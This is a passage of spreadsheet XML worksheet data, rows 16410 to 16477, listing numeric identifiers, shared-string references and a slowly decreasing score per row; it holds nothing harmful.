      <c r="E16410" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16410" s="2">
        <v>0.1927536231884057</v>
      </c>
    </row>
    <row r="16411" ht="15.75" customHeight="1">
      <c r="A16411" s="1">
        <v>18184.0</v>
      </c>
      <c r="B16411" s="2">
        <v>5.2020271E7</v>
      </c>
      <c r="C16411" s="2" t="s">
        <v>15838</v>
      </c>
      <c r="D16411" s="2">
        <v>1.0</v>
      </c>
      <c r="E16411" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16411" s="2">
        <v>0.1925287356321839</v>
      </c>
    </row>
    <row r="16412" ht="15.75" customHeight="1">
      <c r="A16412" s="1">
        <v>19771.0</v>
      </c>
      <c r="B16412" s="2">
        <v>5.6764616E7</v>
      </c>
      <c r="C16412" s="2" t="s">
        <v>15839</v>
      </c>
      <c r="D16412" s="2">
        <v>1.0</v>
      </c>
      <c r="E16412" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16412" s="2">
        <v>0.1925287356321839</v>
      </c>
    </row>
    <row r="16413" ht="15.75" customHeight="1">
      <c r="A16413" s="1">
        <v>3991.0</v>
      </c>
      <c r="B16413" s="2">
        <v>4.0859123E7</v>
      </c>
      <c r="C16413" s="2" t="s">
        <v>15840</v>
      </c>
      <c r="D16413" s="2">
        <v>1.0</v>
      </c>
      <c r="E16413" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16413" s="2">
        <v>0.1921675774134791</v>
      </c>
    </row>
    <row r="16414" ht="15.75" customHeight="1">
      <c r="A16414" s="1">
        <v>28132.0</v>
      </c>
      <c r="B16414" s="2">
        <v>2.4724821E7</v>
      </c>
      <c r="C16414" s="2" t="s">
        <v>15841</v>
      </c>
      <c r="D16414" s="2">
        <v>1.0</v>
      </c>
      <c r="E16414" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16414" s="2">
        <v>0.1908602150537635</v>
      </c>
    </row>
    <row r="16415" ht="15.75" customHeight="1">
      <c r="A16415" s="1">
        <v>19038.0</v>
      </c>
      <c r="B16415" s="2">
        <v>5.4560917E7</v>
      </c>
      <c r="C16415" s="2" t="s">
        <v>15842</v>
      </c>
      <c r="D16415" s="2">
        <v>1.0</v>
      </c>
      <c r="E16415" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16415" s="2">
        <v>0.1905982905982906</v>
      </c>
    </row>
    <row r="16416" ht="15.75" customHeight="1">
      <c r="A16416" s="1">
        <v>25538.0</v>
      </c>
      <c r="B16416" s="2">
        <v>1.42545E7</v>
      </c>
      <c r="C16416" s="2" t="s">
        <v>15843</v>
      </c>
      <c r="D16416" s="2">
        <v>1.0</v>
      </c>
      <c r="E16416" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16416" s="2">
        <v>0.1903460837887068</v>
      </c>
    </row>
    <row r="16417" ht="15.75" customHeight="1">
      <c r="A16417" s="1">
        <v>28911.0</v>
      </c>
      <c r="B16417" s="2">
        <v>2.9444261E7</v>
      </c>
      <c r="C16417" s="2" t="s">
        <v>15844</v>
      </c>
      <c r="D16417" s="2">
        <v>1.0</v>
      </c>
      <c r="E16417" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16417" s="2">
        <v>0.1892655367231639</v>
      </c>
    </row>
    <row r="16418" ht="15.75" customHeight="1">
      <c r="A16418" s="1">
        <v>10694.0</v>
      </c>
      <c r="B16418" s="2">
        <v>1.4778858E7</v>
      </c>
      <c r="C16418" s="2" t="s">
        <v>15845</v>
      </c>
      <c r="D16418" s="2">
        <v>1.0</v>
      </c>
      <c r="E16418" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16418" s="2">
        <v>0.1892655367231638</v>
      </c>
    </row>
    <row r="16419" ht="15.75" customHeight="1">
      <c r="A16419" s="1">
        <v>21575.0</v>
      </c>
      <c r="B16419" s="2">
        <v>2.3838395E7</v>
      </c>
      <c r="C16419" s="2" t="s">
        <v>15846</v>
      </c>
      <c r="D16419" s="2">
        <v>1.0</v>
      </c>
      <c r="E16419" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16419" s="2">
        <v>0.1892655367231638</v>
      </c>
    </row>
    <row r="16420" ht="15.75" customHeight="1">
      <c r="A16420" s="1">
        <v>24079.0</v>
      </c>
      <c r="B16420" s="2">
        <v>9696820.0</v>
      </c>
      <c r="C16420" s="2" t="s">
        <v>15847</v>
      </c>
      <c r="D16420" s="2">
        <v>1.0</v>
      </c>
      <c r="E16420" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16420" s="2">
        <v>0.1892655367231638</v>
      </c>
    </row>
    <row r="16421" ht="15.75" customHeight="1">
      <c r="A16421" s="1">
        <v>34095.0</v>
      </c>
      <c r="B16421" s="2">
        <v>9696819.0</v>
      </c>
      <c r="C16421" s="2" t="s">
        <v>15847</v>
      </c>
      <c r="D16421" s="2">
        <v>1.0</v>
      </c>
      <c r="E16421" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16421" s="2">
        <v>0.1892655367231638</v>
      </c>
    </row>
    <row r="16422" ht="15.75" customHeight="1">
      <c r="A16422" s="1">
        <v>15638.0</v>
      </c>
      <c r="B16422" s="2">
        <v>4.3586278E7</v>
      </c>
      <c r="C16422" s="2" t="s">
        <v>15848</v>
      </c>
      <c r="D16422" s="2">
        <v>1.0</v>
      </c>
      <c r="E16422" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16422" s="2">
        <v>0.1892109500805153</v>
      </c>
    </row>
    <row r="16423" ht="15.75" customHeight="1">
      <c r="A16423" s="1">
        <v>21822.0</v>
      </c>
      <c r="B16423" s="2">
        <v>2.6946777E7</v>
      </c>
      <c r="C16423" s="2" t="s">
        <v>15849</v>
      </c>
      <c r="D16423" s="2">
        <v>1.0</v>
      </c>
      <c r="E16423" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16423" s="2">
        <v>0.1886973180076629</v>
      </c>
    </row>
    <row r="16424" ht="15.75" customHeight="1">
      <c r="A16424" s="1">
        <v>11874.0</v>
      </c>
      <c r="B16424" s="2">
        <v>2.4970329E7</v>
      </c>
      <c r="C16424" s="2" t="s">
        <v>15850</v>
      </c>
      <c r="D16424" s="2">
        <v>1.0</v>
      </c>
      <c r="E16424" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16424" s="2">
        <v>0.1886973180076628</v>
      </c>
    </row>
    <row r="16425" ht="15.75" customHeight="1">
      <c r="A16425" s="1">
        <v>28910.0</v>
      </c>
      <c r="B16425" s="2">
        <v>2.9444261E7</v>
      </c>
      <c r="C16425" s="2" t="s">
        <v>15851</v>
      </c>
      <c r="D16425" s="2">
        <v>1.0</v>
      </c>
      <c r="E16425" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16425" s="2">
        <v>0.1881091617933724</v>
      </c>
    </row>
    <row r="16426" ht="15.75" customHeight="1">
      <c r="A16426" s="1">
        <v>29889.0</v>
      </c>
      <c r="B16426" s="2">
        <v>3607013.0</v>
      </c>
      <c r="C16426" s="2" t="s">
        <v>15852</v>
      </c>
      <c r="D16426" s="2">
        <v>1.0</v>
      </c>
      <c r="E16426" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16426" s="2">
        <v>0.1881091617933724</v>
      </c>
    </row>
    <row r="16427" ht="15.75" customHeight="1">
      <c r="A16427" s="1">
        <v>19184.0</v>
      </c>
      <c r="B16427" s="2">
        <v>5.4973931E7</v>
      </c>
      <c r="C16427" s="2" t="s">
        <v>15853</v>
      </c>
      <c r="D16427" s="2">
        <v>1.0</v>
      </c>
      <c r="E16427" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16427" s="2">
        <v>0.1880952380952381</v>
      </c>
    </row>
    <row r="16428" ht="15.75" customHeight="1">
      <c r="A16428" s="1">
        <v>12513.0</v>
      </c>
      <c r="B16428" s="2">
        <v>2.9649221E7</v>
      </c>
      <c r="C16428" s="2" t="s">
        <v>15854</v>
      </c>
      <c r="D16428" s="2">
        <v>1.0</v>
      </c>
      <c r="E16428" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16428" s="2">
        <v>0.1861111111111111</v>
      </c>
    </row>
    <row r="16429" ht="15.75" customHeight="1">
      <c r="A16429" s="1">
        <v>26932.0</v>
      </c>
      <c r="B16429" s="2">
        <v>1.951153E7</v>
      </c>
      <c r="C16429" s="2" t="s">
        <v>15855</v>
      </c>
      <c r="D16429" s="2">
        <v>1.0</v>
      </c>
      <c r="E16429" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16429" s="2">
        <v>0.1860670194003528</v>
      </c>
    </row>
    <row r="16430" ht="15.75" customHeight="1">
      <c r="A16430" s="1">
        <v>27364.0</v>
      </c>
      <c r="B16430" s="2">
        <v>2.1663189E7</v>
      </c>
      <c r="C16430" s="2" t="s">
        <v>15856</v>
      </c>
      <c r="D16430" s="2">
        <v>1.0</v>
      </c>
      <c r="E16430" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16430" s="2">
        <v>0.185483870967742</v>
      </c>
    </row>
    <row r="16431" ht="15.75" customHeight="1">
      <c r="A16431" s="1">
        <v>16939.0</v>
      </c>
      <c r="B16431" s="2">
        <v>4.819175E7</v>
      </c>
      <c r="C16431" s="2" t="s">
        <v>15857</v>
      </c>
      <c r="D16431" s="2">
        <v>1.0</v>
      </c>
      <c r="E16431" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16431" s="2">
        <v>0.1854460093896714</v>
      </c>
    </row>
    <row r="16432" ht="15.75" customHeight="1">
      <c r="A16432" s="1">
        <v>18422.0</v>
      </c>
      <c r="B16432" s="2">
        <v>5.2710028E7</v>
      </c>
      <c r="C16432" s="2" t="s">
        <v>15858</v>
      </c>
      <c r="D16432" s="2">
        <v>1.0</v>
      </c>
      <c r="E16432" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16432" s="2">
        <v>0.1849507735583685</v>
      </c>
    </row>
    <row r="16433" ht="15.75" customHeight="1">
      <c r="A16433" s="1">
        <v>6211.0</v>
      </c>
      <c r="B16433" s="2">
        <v>4.7986377E7</v>
      </c>
      <c r="C16433" s="2" t="s">
        <v>15859</v>
      </c>
      <c r="D16433" s="2">
        <v>1.0</v>
      </c>
      <c r="E16433" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16433" s="2">
        <v>0.1848958333333334</v>
      </c>
    </row>
    <row r="16434" ht="15.75" customHeight="1">
      <c r="A16434" s="1">
        <v>22400.0</v>
      </c>
      <c r="B16434" s="2">
        <v>3.5610014E7</v>
      </c>
      <c r="C16434" s="2" t="s">
        <v>15860</v>
      </c>
      <c r="D16434" s="2">
        <v>1.0</v>
      </c>
      <c r="E16434" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16434" s="2">
        <v>0.1843033509700177</v>
      </c>
    </row>
    <row r="16435" ht="15.75" customHeight="1">
      <c r="A16435" s="1">
        <v>29405.0</v>
      </c>
      <c r="B16435" s="2">
        <v>3.2013689E7</v>
      </c>
      <c r="C16435" s="2" t="s">
        <v>15861</v>
      </c>
      <c r="D16435" s="2">
        <v>1.0</v>
      </c>
      <c r="E16435" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16435" s="2">
        <v>0.1843033509700177</v>
      </c>
    </row>
    <row r="16436" ht="15.75" customHeight="1">
      <c r="A16436" s="1">
        <v>21401.0</v>
      </c>
      <c r="B16436" s="2">
        <v>2.1851703E7</v>
      </c>
      <c r="C16436" s="2" t="s">
        <v>15862</v>
      </c>
      <c r="D16436" s="2">
        <v>1.0</v>
      </c>
      <c r="E16436" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16436" s="2">
        <v>0.1842105263157896</v>
      </c>
    </row>
    <row r="16437" ht="15.75" customHeight="1">
      <c r="A16437" s="1">
        <v>26232.0</v>
      </c>
      <c r="B16437" s="2">
        <v>1.6280297E7</v>
      </c>
      <c r="C16437" s="2" t="s">
        <v>15863</v>
      </c>
      <c r="D16437" s="2">
        <v>1.0</v>
      </c>
      <c r="E16437" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16437" s="2">
        <v>0.1836158192090396</v>
      </c>
    </row>
    <row r="16438" ht="15.75" customHeight="1">
      <c r="A16438" s="1">
        <v>32914.0</v>
      </c>
      <c r="B16438" s="2">
        <v>6409483.0</v>
      </c>
      <c r="C16438" s="2" t="s">
        <v>15864</v>
      </c>
      <c r="D16438" s="2">
        <v>1.0</v>
      </c>
      <c r="E16438" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16438" s="2">
        <v>0.1831275720164609</v>
      </c>
    </row>
    <row r="16439" ht="15.75" customHeight="1">
      <c r="A16439" s="1">
        <v>24172.0</v>
      </c>
      <c r="B16439" s="2">
        <v>1.0202058E7</v>
      </c>
      <c r="C16439" s="2" t="s">
        <v>15865</v>
      </c>
      <c r="D16439" s="2">
        <v>1.0</v>
      </c>
      <c r="E16439" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16439" s="2">
        <v>0.1830601092896175</v>
      </c>
    </row>
    <row r="16440" ht="15.75" customHeight="1">
      <c r="A16440" s="1">
        <v>30027.0</v>
      </c>
      <c r="B16440" s="2">
        <v>3.6178198E7</v>
      </c>
      <c r="C16440" s="2" t="s">
        <v>15866</v>
      </c>
      <c r="D16440" s="2">
        <v>1.0</v>
      </c>
      <c r="E16440" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16440" s="2">
        <v>0.1830601092896175</v>
      </c>
    </row>
    <row r="16441" ht="15.75" customHeight="1">
      <c r="A16441" s="1">
        <v>33530.0</v>
      </c>
      <c r="B16441" s="2">
        <v>8137495.0</v>
      </c>
      <c r="C16441" s="2" t="s">
        <v>15867</v>
      </c>
      <c r="D16441" s="2">
        <v>1.0</v>
      </c>
      <c r="E16441" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16441" s="2">
        <v>0.1830601092896175</v>
      </c>
    </row>
    <row r="16442" ht="15.75" customHeight="1">
      <c r="A16442" s="1">
        <v>33957.0</v>
      </c>
      <c r="B16442" s="2">
        <v>9308949.0</v>
      </c>
      <c r="C16442" s="2" t="s">
        <v>15868</v>
      </c>
      <c r="D16442" s="2">
        <v>1.0</v>
      </c>
      <c r="E16442" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16442" s="2">
        <v>0.1830601092896175</v>
      </c>
    </row>
    <row r="16443" ht="15.75" customHeight="1">
      <c r="A16443" s="1">
        <v>4105.0</v>
      </c>
      <c r="B16443" s="2">
        <v>4.1333727E7</v>
      </c>
      <c r="C16443" s="2" t="s">
        <v>15869</v>
      </c>
      <c r="D16443" s="2">
        <v>1.0</v>
      </c>
      <c r="E16443" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16443" s="2">
        <v>0.182962962962963</v>
      </c>
    </row>
    <row r="16444" ht="15.75" customHeight="1">
      <c r="A16444" s="1">
        <v>21986.0</v>
      </c>
      <c r="B16444" s="2">
        <v>2.9444262E7</v>
      </c>
      <c r="C16444" s="2" t="s">
        <v>15851</v>
      </c>
      <c r="D16444" s="2">
        <v>1.0</v>
      </c>
      <c r="E16444" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16444" s="2">
        <v>0.1822612085769981</v>
      </c>
    </row>
    <row r="16445" ht="15.75" customHeight="1">
      <c r="A16445" s="1">
        <v>32935.0</v>
      </c>
      <c r="B16445" s="2">
        <v>6458821.0</v>
      </c>
      <c r="C16445" s="2" t="s">
        <v>15870</v>
      </c>
      <c r="D16445" s="2">
        <v>1.0</v>
      </c>
      <c r="E16445" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16445" s="2">
        <v>0.1820512820512821</v>
      </c>
    </row>
    <row r="16446" ht="15.75" customHeight="1">
      <c r="A16446" s="1">
        <v>19077.0</v>
      </c>
      <c r="B16446" s="2">
        <v>5.4636531E7</v>
      </c>
      <c r="C16446" s="2" t="s">
        <v>15871</v>
      </c>
      <c r="D16446" s="2">
        <v>1.0</v>
      </c>
      <c r="E16446" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16446" s="2">
        <v>0.1815920398009951</v>
      </c>
    </row>
    <row r="16447" ht="15.75" customHeight="1">
      <c r="A16447" s="1">
        <v>13160.0</v>
      </c>
      <c r="B16447" s="2">
        <v>3.3906346E7</v>
      </c>
      <c r="C16447" s="2" t="s">
        <v>15872</v>
      </c>
      <c r="D16447" s="2">
        <v>1.0</v>
      </c>
      <c r="E16447" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16447" s="2">
        <v>0.1815476190476191</v>
      </c>
    </row>
    <row r="16448" ht="15.75" customHeight="1">
      <c r="A16448" s="1">
        <v>18682.0</v>
      </c>
      <c r="B16448" s="2">
        <v>5.3588089E7</v>
      </c>
      <c r="C16448" s="2" t="s">
        <v>15873</v>
      </c>
      <c r="D16448" s="2">
        <v>1.0</v>
      </c>
      <c r="E16448" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16448" s="2">
        <v>0.1815476190476191</v>
      </c>
    </row>
    <row r="16449" ht="15.75" customHeight="1">
      <c r="A16449" s="1">
        <v>26078.0</v>
      </c>
      <c r="B16449" s="2">
        <v>1.5630422E7</v>
      </c>
      <c r="C16449" s="2" t="s">
        <v>15874</v>
      </c>
      <c r="D16449" s="2">
        <v>1.0</v>
      </c>
      <c r="E16449" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16449" s="2">
        <v>0.1815476190476191</v>
      </c>
    </row>
    <row r="16450" ht="15.75" customHeight="1">
      <c r="A16450" s="1">
        <v>34143.0</v>
      </c>
      <c r="B16450" s="2">
        <v>9847108.0</v>
      </c>
      <c r="C16450" s="2" t="s">
        <v>15875</v>
      </c>
      <c r="D16450" s="2">
        <v>1.0</v>
      </c>
      <c r="E16450" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16450" s="2">
        <v>0.1815476190476191</v>
      </c>
    </row>
    <row r="16451" ht="15.75" customHeight="1">
      <c r="A16451" s="1">
        <v>331.0</v>
      </c>
      <c r="B16451" s="2">
        <v>1.5790509E7</v>
      </c>
      <c r="C16451" s="2" t="s">
        <v>15876</v>
      </c>
      <c r="D16451" s="2">
        <v>1.0</v>
      </c>
      <c r="E16451" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16451" s="2">
        <v>0.1812386156648452</v>
      </c>
    </row>
    <row r="16452" ht="15.75" customHeight="1">
      <c r="A16452" s="1">
        <v>6721.0</v>
      </c>
      <c r="B16452" s="2">
        <v>4.9280665E7</v>
      </c>
      <c r="C16452" s="2" t="s">
        <v>15877</v>
      </c>
      <c r="D16452" s="2">
        <v>1.0</v>
      </c>
      <c r="E16452" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16452" s="2">
        <v>0.1807313642756681</v>
      </c>
    </row>
    <row r="16453" ht="15.75" customHeight="1">
      <c r="A16453" s="1">
        <v>20701.0</v>
      </c>
      <c r="B16453" s="2">
        <v>1.4530135E7</v>
      </c>
      <c r="C16453" s="2" t="s">
        <v>15878</v>
      </c>
      <c r="D16453" s="2">
        <v>1.0</v>
      </c>
      <c r="E16453" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16453" s="2">
        <v>0.1805555555555555</v>
      </c>
    </row>
    <row r="16454" ht="15.75" customHeight="1">
      <c r="A16454" s="1">
        <v>18558.0</v>
      </c>
      <c r="B16454" s="2">
        <v>5.3168335E7</v>
      </c>
      <c r="C16454" s="2" t="s">
        <v>15879</v>
      </c>
      <c r="D16454" s="2">
        <v>1.0</v>
      </c>
      <c r="E16454" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16454" s="2">
        <v>0.1803418803418804</v>
      </c>
    </row>
    <row r="16455" ht="15.75" customHeight="1">
      <c r="A16455" s="1">
        <v>16097.0</v>
      </c>
      <c r="B16455" s="2">
        <v>4.5394497E7</v>
      </c>
      <c r="C16455" s="2" t="s">
        <v>15880</v>
      </c>
      <c r="D16455" s="2">
        <v>1.0</v>
      </c>
      <c r="E16455" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16455" s="2">
        <v>0.1801075268817205</v>
      </c>
    </row>
    <row r="16456" ht="15.75" customHeight="1">
      <c r="A16456" s="1">
        <v>19768.0</v>
      </c>
      <c r="B16456" s="2">
        <v>5.6752386E7</v>
      </c>
      <c r="C16456" s="2" t="s">
        <v>15881</v>
      </c>
      <c r="D16456" s="2">
        <v>1.0</v>
      </c>
      <c r="E16456" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16456" s="2">
        <v>0.1801075268817205</v>
      </c>
    </row>
    <row r="16457" ht="15.75" customHeight="1">
      <c r="A16457" s="1">
        <v>25164.0</v>
      </c>
      <c r="B16457" s="2">
        <v>1.3075093E7</v>
      </c>
      <c r="C16457" s="2" t="s">
        <v>15882</v>
      </c>
      <c r="D16457" s="2">
        <v>1.0</v>
      </c>
      <c r="E16457" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16457" s="2">
        <v>0.1801075268817205</v>
      </c>
    </row>
    <row r="16458" ht="15.75" customHeight="1">
      <c r="A16458" s="1">
        <v>33833.0</v>
      </c>
      <c r="B16458" s="2">
        <v>8962349.0</v>
      </c>
      <c r="C16458" s="2" t="s">
        <v>15883</v>
      </c>
      <c r="D16458" s="2">
        <v>1.0</v>
      </c>
      <c r="E16458" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16458" s="2">
        <v>0.1801075268817205</v>
      </c>
    </row>
    <row r="16459" ht="15.75" customHeight="1">
      <c r="A16459" s="1">
        <v>23946.0</v>
      </c>
      <c r="B16459" s="2">
        <v>8863274.0</v>
      </c>
      <c r="C16459" s="2" t="s">
        <v>15884</v>
      </c>
      <c r="D16459" s="2">
        <v>1.0</v>
      </c>
      <c r="E16459" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16459" s="2">
        <v>0.1799336650082919</v>
      </c>
    </row>
    <row r="16460" ht="15.75" customHeight="1">
      <c r="A16460" s="1">
        <v>10980.0</v>
      </c>
      <c r="B16460" s="2">
        <v>1.7364732E7</v>
      </c>
      <c r="C16460" s="2" t="s">
        <v>15885</v>
      </c>
      <c r="D16460" s="2">
        <v>1.0</v>
      </c>
      <c r="E16460" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16460" s="2">
        <v>0.17984934086629</v>
      </c>
    </row>
    <row r="16461" ht="15.75" customHeight="1">
      <c r="A16461" s="1">
        <v>14780.0</v>
      </c>
      <c r="B16461" s="2">
        <v>4.089441E7</v>
      </c>
      <c r="C16461" s="2" t="s">
        <v>15886</v>
      </c>
      <c r="D16461" s="2">
        <v>1.0</v>
      </c>
      <c r="E16461" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16461" s="2">
        <v>0.17984934086629</v>
      </c>
    </row>
    <row r="16462" ht="15.75" customHeight="1">
      <c r="A16462" s="1">
        <v>16710.0</v>
      </c>
      <c r="B16462" s="2">
        <v>4.7425716E7</v>
      </c>
      <c r="C16462" s="2" t="s">
        <v>15887</v>
      </c>
      <c r="D16462" s="2">
        <v>1.0</v>
      </c>
      <c r="E16462" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16462" s="2">
        <v>0.1790123456790124</v>
      </c>
    </row>
    <row r="16463" ht="15.75" customHeight="1">
      <c r="A16463" s="1">
        <v>20886.0</v>
      </c>
      <c r="B16463" s="2">
        <v>1.6097681E7</v>
      </c>
      <c r="C16463" s="2" t="s">
        <v>15888</v>
      </c>
      <c r="D16463" s="2">
        <v>1.0</v>
      </c>
      <c r="E16463" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16463" s="2">
        <v>0.1783625730994153</v>
      </c>
    </row>
    <row r="16464" ht="15.75" customHeight="1">
      <c r="A16464" s="1">
        <v>23466.0</v>
      </c>
      <c r="B16464" s="2">
        <v>5713784.0</v>
      </c>
      <c r="C16464" s="2" t="s">
        <v>15889</v>
      </c>
      <c r="D16464" s="2">
        <v>1.0</v>
      </c>
      <c r="E16464" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16464" s="2">
        <v>0.1783625730994153</v>
      </c>
    </row>
    <row r="16465" ht="15.75" customHeight="1">
      <c r="A16465" s="1">
        <v>28130.0</v>
      </c>
      <c r="B16465" s="2">
        <v>2.4724821E7</v>
      </c>
      <c r="C16465" s="2" t="s">
        <v>15890</v>
      </c>
      <c r="D16465" s="2">
        <v>1.0</v>
      </c>
      <c r="E16465" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16465" s="2">
        <v>0.1783625730994153</v>
      </c>
    </row>
    <row r="16466" ht="15.75" customHeight="1">
      <c r="A16466" s="1">
        <v>31677.0</v>
      </c>
      <c r="B16466" s="2">
        <v>5187255.0</v>
      </c>
      <c r="C16466" s="2" t="s">
        <v>15891</v>
      </c>
      <c r="D16466" s="2">
        <v>1.0</v>
      </c>
      <c r="E16466" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16466" s="2">
        <v>0.1783625730994153</v>
      </c>
    </row>
    <row r="16467" ht="15.75" customHeight="1">
      <c r="A16467" s="1">
        <v>32501.0</v>
      </c>
      <c r="B16467" s="2">
        <v>5713783.0</v>
      </c>
      <c r="C16467" s="2" t="s">
        <v>15892</v>
      </c>
      <c r="D16467" s="2">
        <v>1.0</v>
      </c>
      <c r="E16467" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16467" s="2">
        <v>0.1783625730994153</v>
      </c>
    </row>
    <row r="16468" ht="15.75" customHeight="1">
      <c r="A16468" s="1">
        <v>29247.0</v>
      </c>
      <c r="B16468" s="2">
        <v>3.0858431E7</v>
      </c>
      <c r="C16468" s="2" t="s">
        <v>15893</v>
      </c>
      <c r="D16468" s="2">
        <v>1.0</v>
      </c>
      <c r="E16468" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16468" s="2">
        <v>0.17831541218638</v>
      </c>
    </row>
    <row r="16469" ht="15.75" customHeight="1">
      <c r="A16469" s="1">
        <v>31493.0</v>
      </c>
      <c r="B16469" s="2">
        <v>5062934.0</v>
      </c>
      <c r="C16469" s="2" t="s">
        <v>15894</v>
      </c>
      <c r="D16469" s="2">
        <v>1.0</v>
      </c>
      <c r="E16469" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16469" s="2">
        <v>0.17831541218638</v>
      </c>
    </row>
    <row r="16470" ht="15.75" customHeight="1">
      <c r="A16470" s="1">
        <v>25190.0</v>
      </c>
      <c r="B16470" s="2">
        <v>1.3172003E7</v>
      </c>
      <c r="C16470" s="2" t="s">
        <v>15895</v>
      </c>
      <c r="D16470" s="2">
        <v>1.0</v>
      </c>
      <c r="E16470" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16470" s="2">
        <v>0.1779661016949153</v>
      </c>
    </row>
    <row r="16471" ht="15.75" customHeight="1">
      <c r="A16471" s="1">
        <v>9657.0</v>
      </c>
      <c r="B16471" s="2">
        <v>5.629667E7</v>
      </c>
      <c r="C16471" s="2" t="s">
        <v>15896</v>
      </c>
      <c r="D16471" s="2">
        <v>1.0</v>
      </c>
      <c r="E16471" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16471" s="2">
        <v>0.1776094276094277</v>
      </c>
    </row>
    <row r="16472" ht="15.75" customHeight="1">
      <c r="A16472" s="1">
        <v>12295.0</v>
      </c>
      <c r="B16472" s="2">
        <v>2.8269474E7</v>
      </c>
      <c r="C16472" s="2" t="s">
        <v>15897</v>
      </c>
      <c r="D16472" s="2">
        <v>1.0</v>
      </c>
      <c r="E16472" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16472" s="2">
        <v>0.1775793650793652</v>
      </c>
    </row>
    <row r="16473" ht="15.75" customHeight="1">
      <c r="A16473" s="1">
        <v>30294.0</v>
      </c>
      <c r="B16473" s="2">
        <v>3.7733046E7</v>
      </c>
      <c r="C16473" s="2" t="s">
        <v>15898</v>
      </c>
      <c r="D16473" s="2">
        <v>1.0</v>
      </c>
      <c r="E16473" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16473" s="2">
        <v>0.1772486772486773</v>
      </c>
    </row>
    <row r="16474" ht="15.75" customHeight="1">
      <c r="A16474" s="1">
        <v>18172.0</v>
      </c>
      <c r="B16474" s="2">
        <v>5.1936003E7</v>
      </c>
      <c r="C16474" s="2" t="s">
        <v>15899</v>
      </c>
      <c r="D16474" s="2">
        <v>1.0</v>
      </c>
      <c r="E16474" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16474" s="2">
        <v>0.1769759450171821</v>
      </c>
    </row>
    <row r="16475" ht="15.75" customHeight="1">
      <c r="A16475" s="1">
        <v>30059.0</v>
      </c>
      <c r="B16475" s="2">
        <v>3625090.0</v>
      </c>
      <c r="C16475" s="2" t="s">
        <v>15900</v>
      </c>
      <c r="D16475" s="2">
        <v>1.0</v>
      </c>
      <c r="E16475" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16475" s="2">
        <v>0.1768518518518519</v>
      </c>
    </row>
    <row r="16476" ht="15.75" customHeight="1">
      <c r="A16476" s="1">
        <v>18831.0</v>
      </c>
      <c r="B16476" s="2">
        <v>5.3940684E7</v>
      </c>
      <c r="C16476" s="2" t="s">
        <v>15901</v>
      </c>
      <c r="D16476" s="2">
        <v>1.0</v>
      </c>
      <c r="E16476" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16476" s="2">
        <v>0.1765232974910395</v>
      </c>
    </row>
    <row r="16477" ht="15.75" customHeight="1">
      <c r="A16477" s="1">
        <v>23957.0</v>
      </c>
      <c r="B16477" s="2">
        <v>8962350.0</v>
      </c>
      <c r="C16477" s="2" t="s">
        <v>15883</v>
      </c>
      <c r="D16477" s="2">
        <v>1.0</v>
      </c>
      <c r="E16477" s="3" t="s">
        <v>15755</v>
      </c>
